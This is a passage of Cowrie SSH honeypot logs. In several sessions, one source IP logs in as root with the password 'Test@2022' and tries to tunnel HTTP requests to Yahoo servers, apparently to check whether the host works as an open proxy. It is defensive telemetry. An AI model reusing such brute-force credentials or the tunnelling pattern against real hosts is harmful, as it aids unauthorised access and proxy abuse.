"rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.026125Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.307906Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32439,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32439","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.365356Z","session":"8d1446cd9886"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.421849Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10848,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10848","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.578999Z","session":"8d1446cd9886"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.635572Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.692723Z","src_ip":"213.209.150.239","session":"8d1446cd9886"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61166,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b37f15f7a80","protocol":"ssh","message":"New connection: 213.209.150.239:61166 (1.2.3.4:22) [session: 4b37f15f7a80]","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.748614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.749324Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:38.806033Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.088354Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11186,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11186","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.146484Z","session":"4b37f15f7a80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.203241Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":1914,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1914","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.359206Z","session":"4b37f15f7a80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.416155Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.473567Z","src_ip":"213.209.150.239","session":"4b37f15f7a80"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61289,"dst_ip":"1.2.3.4","dst_port":22,"session":"ade94ddd69c2","protocol":"ssh","message":"New connection: 213.209.150.239:61289 (1.2.3.4:22) [session: ade94ddd69c2]","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.519760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.520374Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.567554Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.801862Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18723,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18723","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.849934Z","session":"ade94ddd69c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:39.897095Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22855,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22855","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.033469Z","session":"ade94ddd69c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.080691Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.128831Z","src_ip":"213.209.150.239","session":"ade94ddd69c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61321,"dst_ip":"1.2.3.4","dst_port":22,"session":"33e68f520e45","protocol":"ssh","message":"New connection: 213.209.150.239:61321 (1.2.3.4:22) [session: 33e68f520e45]","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.184459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.185570Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.241976Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.523917Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5567,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5567","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.581924Z","session":"33e68f520e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.638784Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7996,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7996","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.795014Z","session":"33e68f520e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.851782Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.909665Z","src_ip":"213.209.150.239","session":"33e68f520e45"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61374,"dst_ip":"1.2.3.4","dst_port":22,"session":"15efa9bfb161","protocol":"ssh","message":"New connection: 213.209.150.239:61374 (1.2.3.4:22) [session: 15efa9bfb161]","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.956008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:40.956648Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.004038Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.239514Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12469,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12469","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.287523Z","session":"15efa9bfb161"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.335153Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14121,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14121","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.469578Z","session":"15efa9bfb161"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.518234Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.567167Z","src_ip":"213.209.150.239","session":"15efa9bfb161"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61412,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f532619645","protocol":"ssh","message":"New connection: 213.209.150.239:61412 (1.2.3.4:22) [session: c2f532619645]","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.613123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.613937Z","src_ip":"213.209.150.239","session":"c2f532619645"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.661139Z","src_ip":"213.209.150.239","session":"c2f532619645"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.895748Z","src_ip":"213.209.150.239","session":"c2f532619645"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21638,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21638","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.943746Z","session":"c2f532619645"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:41.991709Z","src_ip":"213.209.150.239","session":"c2f532619645"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":3764,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3764","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.129460Z","session":"c2f532619645"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.176609Z","src_ip":"213.209.150.239","session":"c2f532619645"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:42.224572Z","src_ip":"213.209.150.239","session":"c2f532619645"}
